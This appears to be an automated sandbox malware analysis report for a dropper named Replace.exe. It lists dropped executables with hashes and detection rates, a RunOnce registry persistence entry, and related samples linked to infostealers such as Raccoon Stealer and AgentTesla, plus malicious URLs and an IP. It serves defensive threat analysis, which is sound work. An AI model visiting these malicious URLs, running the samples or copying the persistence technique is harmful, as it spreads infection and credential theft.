                                                                                                                                                                  • Execution Graph export aborted for target node.exe, PID 8296 because there are no executed function
                                                                                                                                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
10:08:56 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce InetHelper "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
10:09:04 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce InetHelper "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
11:08:04 | API Interceptor | 3x Sleep call for process: rundll32.exe modified
11:08:53 | API Interceptor | 10x Sleep call for process: WMIC.exe modified
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  239.255.255.250https://www.allemania.ro/xbegtx/?77562981Get hashmaliciousUnknownBrowse
                                                                                                                                                                    SecuriteInfo.com.Win32.Evo-gen.14997.5526.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/eGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        bad.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                          https://thaksaubie.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                            24314_DellFW_UPGRADE_DOCK_UTILITY_v1.2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              https://u44194017.ct.sendgrid.net/ls/click?upn=u001.DFVMuW4-2FEZd5YVb67fax3vlta-2FCThF5DL5AiBOKSuCQ0EGblKsjjwZ6OyBnFJ1r0moLWoXz-2FxMe7b-2Fl8d95-2BzQZm5sEfp0OhOo7B3jcXBv-2BgE3OtXGpSU6X45OZo1Nrxk2IftEiMrIOyVB56ojuhdoJljt5g2SSHyY7oPkJJgIc8WZfAGQwKIBDDb5RgJUJQ66qTgciuugoqvdSYhCxYJC1tgX93eAUNOEu10Nm7b0U-3DknVp_7tKkve0pPj06aVCwrllSgRRNXKtXxcU59nMcisLNciFJdA-2BcFyVeCwSnhI-2BRdQ1qFfxu7tK4pt-2FudMGWFIdmDbcopC0QM1U4rVigQkZdCnBEZMNAr3v7VDeciiUe7Q0Ot-2FxmcDN99buzfdPKtuJBA-2BhqOF-2BxjX9XlNsaEZDFjTkWHyxaBFOX5Dme9fmey6KiIaeINCkVXw-2Bxc1n6NEs1rw-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                attachment.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                  171454686603a18a555a7edce5c88a8af9597443cf22f96b4668e6805cbdd7fb34b4026c9d600.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    citat-05012024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      74.201.73.52file.exeGet hashmaliciousGlupteba, GuLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousFabookieBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousFabookie, Glupteba, StealcBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousHTMLPhisher, Fabookie, Glupteba, GuLoader, StealcBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousHTMLPhisher, Fabookie, Glupteba, StealcBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousHTMLPhisher, Fabookie, GuLoader, Stealc, VidarBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousHTMLPhisher, Fabookie, Glupteba, StealcBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousGlupteba, Socks5Systemz, VidarBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousGlupteba, Socks5Systemz, VidarBrowse
                                                                                                                                                                                                        Syutqxpe7O.exeGet hashmaliciousGlupteba, VidarBrowse
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe | z5i6tLOUD0.exe | malicious | Raccoon Stealer v2
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe
                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):294584
                                                                                                                                                                                                            Entropy (8bit):6.743710084630691
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:gcwjo+g91cs3mfzsIohx4rrZtj7QfGZ7uOs:gcao3R2fzdou3jjZ7uOs
                                                                                                                                                                                                            MD5:8D4AEE53F9D6EA4A47DC73EDD78DCEF0
                                                                                                                                                                                                            SHA1:4D12D67EDD64877831DEA463CE67C42EBCA6E0AE
                                                                                                                                                                                                            SHA-256:6CFC98D1FFCDB983E64BEAC75CCDE7D873E3C41FFFDE2F4D87DD0757EB5A620D
                                                                                                                                                                                                            SHA-512:54EAA03F18BCCADDB04A8DD7127F1E9CE8EEFAF1141E3B8684E7F6BBDCC45AA60AA276467F1DF9BD361D0AC8C8DE398959BE18BF2E387DCE34550716E44599EC
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):50859192
                                                                                                                                                                                                            Entropy (8bit):7.541115142114078
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:786432:bol/RBJt80hHNghhydfhuVt/m1f1GFxVDOpoFZb3daUIOGB3:y/RBJ2QNgvybuj/m6NFZb1G
                                                                                                                                                                                                            MD5:E577EF3CFADBB80C6AF8F37BF6E62F70
                                                                                                                                                                                                            SHA1:C27F57E17539F09CEC7B47C223DFA8EA54B851FE
                                                                                                                                                                                                            SHA-256:60392A436109F0B236C2B26CCAF677F3E0E0BD338AEC35A6495C0A25F73E3F15
                                                                                                                                                                                                            SHA-512:A1FA8BB2E148E76E2CCEDFED94D8C93841E086821FE258ADB931F12A1685BF2F5B5A9A131AECE81B18441FDB48112C5F5C914E49A8C689138333FF0C427BCA49
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 6%, Browse
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsA071.tmp
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4096
                                                                                                                                                                                                            Entropy (8bit):4.102419828599722
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:6EuTWvVUSOmj4g7pDU2MeUkCevHr8IDPrOq81vj/bEGf2dz:r93OSnMe33r3kcNdz
                                                                                                                                                                                                            MD5:E9DED10DFF258F6522FE9079ED3319CA
                                                                                                                                                                                                            SHA1:B0127EA7675F6359BFA80A7BF6282BD1C989B405
                                                                                                                                                                                                            SHA-256:EA1D61984EDE5908E0840E91A71BB127EFD62D836C1F76702B426FD79B57F780
                                                                                                                                                                                                            SHA-512:D95482D3CF50B37E999E3F91377BD41A215F3F0C55C9F3E47FC9C563B9CD3F5C5EE945878889A8147B9F089005826CE81398172395D0107DC14EB8FEFC0D36DE
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 73%, Browse
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsA071.tmp
                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6887560
                                                                                                                                                                                                            Entropy (8bit):7.995378654994156
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:196608:QLqzi3tI29TS60FIEPgaJzR1VOoaOVxRtx:QLqzi3XT0uEp/ooaWzx
                                                                                                                                                                                                            MD5:5F40521D2E1082FE1C734610C4A83911
                                                                                                                                                                                                            SHA1:86D54874CC8976CDB75A9DC8DCD817AF50837796
                                                                                                                                                                                                            SHA-256:79AC7AE94231A392D27F303418E305A60C4194DBBE143C5DEFFC977C7B2E7A78
                                                                                                                                                                                                            SHA-512:EF2B54B46844CFB13CFDEF6271E2A8B4E646D2E31CA55229E5C76CA90C649895533BC8FB83C4D50DD3721ABB2A5E4C5EE32DF5C4540E1C14498A5E9B550D3189
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: z5i6tLOUD0.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsA071.tmp
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (42843)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):190594
                                                                                                                                                                                                            Entropy (8bit):5.403457343574024
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:fBBZhuuaOKnzpxfuZlrmpSDjmiwo6DQUH0RUISQ2PgdLJ35kCJQuHoz3jn:5BZhuuaBnzpxf5pSDjf6DhHk2PgdN5Lw
                                                                                                                                                                                                            MD5:42FB0FA52C2E0BBBDF379C1ABA97D12E
                                                                                                                                                                                                            SHA1:164C4639D99A7DCFACF29DA930CA4DFEF3621A11
                                                                                                                                                                                                            SHA-256:3DB6FFA48CAE2DBDC68F9BF5EE75BA5B7ABD4F923C5FC6741477916957909071
                                                                                                                                                                                                            SHA-512:B9E96BA85508BB44F49DBF92185157DB149FAB2A6245A2D39CE49DA5AE14617928F44CF8EE2BCB8C9DD4060082CC4B2B84EA6FF7659CE15CAA8D9DA02C46C936
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsA071.tmp
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:x:x
                                                                                                                                                                                                            MD5:6920626369B1F05844F5E3D6F93B5F6E
                                                                                                                                                                                                            SHA1:EDFB92A5BE2A31A47D117F6C1530E1CEBE1B4963
                                                                                                                                                                                                            SHA-256:5E73D6D7EDD38DAEAE9F10721987E301E4D4B5421E88EB17063AC5A41B168273
                                                                                                                                                                                                            SHA-512:0B307A2ECA21778E3FCA2D855F0E12FF10726FE276BEDBF70B40E10F21DE839922384D494B67D65A21D4FA15D8642A84B6C39B15AB7E91F3B9555A53ECE4F882
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:bt
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Replace.exe
                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):36542497
                                                                                                                                                                                                            Entropy (8bit):7.996676840188324
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:786432:PHYEktqugC1limyl/Qb7TMNdi8q8aPn6Ck0IjxGYuIMD9FwLNb1O:PHtud208uyCtIHMDf80
                                                                                                                                                                                                            MD5:D77C3EF3EFA7E38EF91137466EEE801B
                                                                                                                                                                                                            SHA1:0B6CE4B03F43C2A7290F95BFBBE9107298EFEAEF
                                                                                                                                                                                                            SHA-256:91C2295F354B0616AA6481708248F6CE35DBE9292901464FC6BF3A22522CCB2F
                                                                                                                                                                                                            SHA-512:7C0171509814F7E5F24B2A9D53A10AB282586EC56BCDEDC2DEB2BA1AA2B4D9EDADE6D6D753CA80FB65D147597BFD4AC9F30E330E88C695E72C913FF3AB224750
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 7%, Browse
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7289386
                                                                                                                                                                                                            Entropy (8bit):7.96739805150338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:196608:TRLqzi3tI29TS60FIEPgaJzR1VOoaOVxRt:dLqzi3XT0uEp/ooaWz
                                                                                                                                                                                                            MD5:8D57CCBCBCEF08983E7C76186A225DD4
                                                                                                                                                                                                            SHA1:7319C5569CCB115641146DAA1FD199F007FB0900
                                                                                                                                                                                                            SHA-256:D8AB13351F87952882BCDD22E272DFD7FC12B19D4C9D1238992BDB3E667EF2BD
                                                                                                                                                                                                            SHA-512:8E19B7FB99469C882A7811C2E1268D0B4E65DE5F3744E34A5EBCC7986A5E571ED34CF44281D8E08182598CB7DBF7C1DB23A5FE5FE1C922436DC9475FA2A534F9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7289386
                                                                                                                                                                                                            Entropy (8bit):7.96739805150338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:196608:TRLqzi3tI29TS60FIEPgaJzR1VOoaOVxRt:dLqzi3XT0uEp/ooaWz
                                                                                                                                                                                                            MD5:8D57CCBCBCEF08983E7C76186A225DD4
                                                                                                                                                                                                            SHA1:7319C5569CCB115641146DAA1FD199F007FB0900
                                                                                                                                                                                                            SHA-256:D8AB13351F87952882BCDD22E272DFD7FC12B19D4C9D1238992BDB3E667EF2BD
                                                                                                                                                                                                            SHA-512:8E19B7FB99469C882A7811C2E1268D0B4E65DE5F3744E34A5EBCC7986A5E571ED34CF44281D8E08182598CB7DBF7C1DB23A5FE5FE1C922436DC9475FA2A534F9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wnsA071.tmp
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7289386
                                                                                                                                                                                                            Entropy (8bit):7.96739805150338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:196608:TRLqzi3tI29TS60FIEPgaJzR1VOoaOVxRt:dLqzi3XT0uEp/ooaWz
                                                                                                                                                                                                            MD5:8D57CCBCBCEF08983E7C76186A225DD4
                                                                                                                                                                                                            SHA1:7319C5569CCB115641146DAA1FD199F007FB0900
                                                                                                                                                                                                            SHA-256:D8AB13351F87952882BCDD22E272DFD7FC12B19D4C9D1238992BDB3E667EF2BD
                                                                                                                                                                                                            SHA-512:8E19B7FB99469C882A7811C2E1268D0B4E65DE5F3744E34A5EBCC7986A5E571ED34CF44281D8E08182598CB7DBF7C1DB23A5FE5FE1C922436DC9475FA2A534F9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7055674
                                                                                                                                                                                                            Entropy (8bit):7.999719681341328
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:98304:W3njVY6OUdcAFccO//cirLLuaj06dT92azIXajHMtHM8gGIOBYADTeLhl6GC1tLt:W3Hvn5irnuaA6GaPj+VgGIOYSTeLXo
                                                                                                                                                                                                            MD5:7A506A2E92BC66A9F64C2333A815E97A
                                                                                                                                                                                                            SHA1:A123F6C070F4258C481CB0B6C2B5D1403463E2FA
                                                                                                                                                                                                            SHA-256:C9DACA7DE1B623867AEE943A1D508573841F2584FFA91AAAF09DE2A883D2733F
                                                                                                                                                                                                            SHA-512:8BDEC3839CA8E0C72DCB76455AD1585264DCEF4150D90E0299B477F99590A1B98AC0BD377985AC2E8E2C15F071588AD821650FC200E0F65EC4583F3F82582E30
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Replace.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6656
                                                                                                                                                                                                            Entropy (8bit):4.828894210941588
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:DWYJfktl9o3fraRGA27A0xsuFj9+eKmuJGZY6Gn17/xr:6Efkt7o3fraR5Wvsu7+1JGZ/Gnt
                                                                                                                                                                                                            MD5:41E689A7859429D628C34A82BCBB1187
                                                                                                                                                                                                            SHA1:F435C4225FC00B3CE4543B812731A65D3722BDC3
                                                                                                                                                                                                            SHA-256:252DD587C652E9939432BD8B5574590C4A8DB64660BC753F5490A472703F5C3A
                                                                                                                                                                                                            SHA-512:6A8F76F4D2EEB78DF1C48F43C8D31F4510F2BA8DA71FBB93D88627EBA5F4CC74EB9AA12B7688D7FB62ED938FE2AC15BD2C060D6AD90E5B2C61114F74FCECEC85
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 67%, Browse
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1746)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):163891
                                                                                                                                                                                                            Entropy (8bit):5.55061820245277
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:S0eiNiuzs8v4HHKWY8s1BgP4IDQ9GURWu8zylA/u8PemUPhDlaY/ADiZ65LpK629:S0eMhzvwHHKWY8s1BgP4IDQ9GURWu8UD
                                                                                                                                                                                                            MD5:0282D5C4C6038FCEB2FF8607EDAC81A4
                                                                                                                                                                                                            SHA1:62EBF05C33F8A3115C208BB4D5CE9B38F6D06447
                                                                                                                                                                                                            SHA-256:AAAF17E8ED9C8DD5D1B69C8BBB617600A768256654C076F760E09C6047973371
                                                                                                                                                                                                            SHA-512:E21D25042E41527B62E80F9D9B82B85B915BA6D0698B2FFA5D8D59115F764770D1DE2108B72D82D57BFB7A8D4406FB53D091C1DC6D8BD03BED3BCA29CEFD0EAD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.oT1FwJRCVC4.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvBynad-nWEy1xIb9j1w6LpLOF6IQ"
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2937)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):2942
                                                                                                                                                                                                            Entropy (8bit):5.842780062817867
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:RuHwFGWQGKlgZ01IFb8jsgIbx6666PuimRDJaYdFUawY7lXcQjlwV+ib37aOcQgJ:RfkD9liywgIN6666PEWYLUkXculwdraj
                                                                                                                                                                                                            MD5:BC5E2F0579E5FA470364680F05389C67
                                                                                                                                                                                                            SHA1:808A9CF1332725F0F0765CDA9A7A3B2E5AD16D3D
                                                                                                                                                                                                            SHA-256:2FBFA151A394F6A4B24169A7DB61B4CF700C4FC72FEF61BF58903D28A7251420
                                                                                                                                                                                                            SHA-512:60BC3D32E8676B4D0DC4897FCF48430725BB29FEA94BD6C980F781FDE9FE8FB9BAD6643C4201FCDAF92259B1DBD21C9D15D4F53520F315FBEABBAE91396AD463
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):29
                                                                                                                                                                                                            Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                            MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                            SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                            SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                            SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                            Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):139819
                                                                                                                                                                                                            Entropy (8bit):5.440766391654872
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:yMRA4aoKJXjPInWWt/usD98kiHLnRA0zqevcZgDhaV+trbbbhYxvdU:eCKJou8TMyel0shCO
                                                                                                                                                                                                            MD5:E92447BF94FA592067E133CF3E581D3D
                                                                                                                                                                                                            SHA1:E0CDECE2EE36171EC9008DC3D676E9EC7E273F89
                                                                                                                                                                                                            SHA-256:C8B666DC1E76BF51ED250F8DB10DAAC14E13EBA6D52E41EA9D12FEFB3EDF5701
                                                                                                                                                                                                            SHA-512:A6D6B74FFD9DC5BC4C37ABD5CF4992D56C72933D872D70AADAB6FF83C66E6F013E779EA1A5126E7E69D9A4F9B1F65B4EAF5CCB516B1F83037913C64D88913B8B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3572), with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):3572
                                                                                                                                                                                                            Entropy (8bit):5.150542995862274
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:RJYrcoiktfqqMghOKTEzNx8BSIMw591g8IOl8u8i8DF+Ks:wkktfqqMghxlg8Ig8u78D2
                                                                                                                                                                                                            MD5:88BC8C86A83B9BD8EDA6FDF225CDC8DD
                                                                                                                                                                                                            SHA1:473D84930F027A365278C15282725A69721F4B18
                                                                                                                                                                                                            SHA-256:47D960E93D9E7AB4C760A09DA0AA5E6549A8355AD5C0BA8476D4269F4FBDB354
                                                                                                                                                                                                            SHA-512:3BC486D908160D297AD3028C27177A9C41A1D87EF29A456058265FAF74A1DA069D3B0578F05A79F866C2DB752D5E0E42D179158BD62251D4FDA601A7CBA7CC4D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.T5bVtXo12IQ.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTssrVR1lBtzoy_MObv1DSp-vWG36A"
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1660
                                                                                                                                                                                                            Entropy (8bit):4.301517070642596
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                            MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                            SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                            SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                            SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2124)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):121628
                                                                                                                                                                                                            Entropy (8bit):5.506662476672723
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:QI9yvwslCsrCF9f/U2Dj3Fkk7rEehA5L1kx:l9ygsrieDkVaL1kx
                                                                                                                                                                                                            MD5:F46ACD807A10216E6EEE8EA51E0F14D6
                                                                                                                                                                                                            SHA1:4702F47070F7046689432DCF605F11364BC0FBED
                                                                                                                                                                                                            SHA-256:D6B84873D27E7E83CF5184AAEF778F1CCB896467576CD8AF2CAD09B31B3C6086
                                                                                                                                                                                                            SHA-512:811263DC85C8DAA3A6E5D8A002CCCB953CD01E6A77797109835FE8B07CABE0DEE7EB126274E84266229880A90782B3B016BA034E31F0E3B259BF9E66CA797028
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0"
                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):7.998466347215378
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:Replace.exe
                                                                                                                                                                                                            File size:36'540'866 bytes
                                                                                                                                                                                                            MD5:fd5cd14325c51ecab6a57d1d665f8852
                                                                                                                                                                                                            SHA1:ea16aa0f197210437733c63a42a8f1dd6442d753
                                                                                                                                                                                                            SHA256:d433cd0ba6b6850a9f616b3b89754a005699547d4e04fadb75cade770156cfd1
